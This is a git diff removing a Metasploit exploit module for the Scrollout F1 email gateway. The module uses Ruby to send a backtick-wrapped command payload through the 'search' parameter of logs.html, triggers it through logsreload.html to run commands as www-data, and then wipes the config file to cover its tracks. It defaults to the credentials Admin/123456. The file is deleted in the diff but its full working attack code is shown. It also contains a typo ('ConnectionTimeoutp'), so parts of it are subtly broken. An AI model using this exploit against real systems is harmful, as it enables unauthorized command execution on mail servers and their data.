diff --git a/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb b/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb
deleted file mode 100644
index 2387f8b2fe..0000000000
--- a/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb
+++ /dev/null
@@ -1,156 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
-
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info={})
- super(update_info(info,
- 'Name' => 'Scrollout F1 Email Gateway loadLogs Command Execution',
- 'Description' => %q{
- This module exploits a command execution vulnerability in Scrollout F1
- version 2012-10-03 which could be abused to allow authenticated users to
- execute arbitrary commands under the context of the 'www-data' user.
- The 'loadLogs' function in the 'logsreload.php' file calls 'shell_exec()'
- with user controlled data from the 'search' parameter.
- },
- 'References' =>
- [
- ['URL', 'http://itsecuritysolutions.org/2013-01-29-Scrollout-arbitrary-command-execution-vulnerability'],
- ],
- 'Author' =>
- [
- 'Brendan Coles ', # Discovery and exploit
- ],
- 'License' => MSF_LICENSE,
- 'Privileged' => true,
- 'Arch' => ARCH_CMD,
- 'Platform' => 'unix',
- 'Payload' =>
- {
- 'BadChars' => "\x00",
- 'Compat' =>
- {
- 'PayloadType' => 'cmd',
- 'RequiredCmd' => 'python perl bash netcat-e',
- },
- },
- 'Targets' =>
- [
- ['Automatic Targeting', { 'auto' => true }]
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => "Jan 29 2013",
- ))
-
- register_options([
- OptBool.new('SSL', [true, 'Use SSL', false]),
- OptString.new('BasicAuthUser', [true, 'The Scrollout username', 'Admin']),
- OptString.new('BasicAuthPass', [true, 'The Scrollout password', '123456']),
- OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
- ], self.class)
- end
-
- def check
-
- peer = "#{rhost}:#{rport}"
- base = target_uri.path
- base << '/' if base[-1, 1] != '/'
- user = datastore['BasicAuthUser']
-
- # send check
- print_status("#{peer} - Authenticating as user '#{user}'")
- begin
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "#{base}",
- })
- if res and res.code == 401
- print_error("#{peer} - Authentication failed")
- return Exploit::CheckCode::Unknown
- elsif res and res.code == 200 and res.body =~ /Scrollout F1<\/title>/
- return Exploit::CheckCode::Detected
- end
- return Exploit::CheckCode::Safe
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
- print_error("#{peer} - Connection failed")
- end
- return Exploit::CheckCode::Unknown
-
- end
-
- def exploit
-
- @peer = "#{rhost}:#{rport}"
- base = target_uri.path
- base << '/' if base[-1, 1] != '/'
- command = Rex::Text.uri_encode(payload.encoded)
-
- # send payload
- print_status("#{@peer} - Sending payload (#{command.length} bytes)")
- begin
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => "#{base}logs.html",
- 'data' => "search=`#{command}`",
- })
- if res and res.code == 200
- print_good("#{@peer} - Payload sent successfully")
- elsif res and res.code == 401
- fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
- else
- fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
- end
-
- # send payload trigger
- print_status("#{@peer} - Sending payload trigger")
- begin
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "#{base}logsreload.html",
- })
- if res and res.code == 200
- print_good("#{@peer} - Payload trigger sent successfully")
- elsif res and res.code == 401
- fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
- else
- fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Triggering payload failed")
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
- end
-
- # cleanup
- print_status("#{@peer} - Cleaning up config file (filter.cfg)")
- begin
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => "#{base}logs.html",
- 'data' => "search=",
- })
- if res and res.code == 200
- print_good("#{@peer} - Cleaning completed successfully")
- elsif res and res.code == 401
- fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
- else
- fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Cleaning failed")
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
- end
-
- end
-
-end
-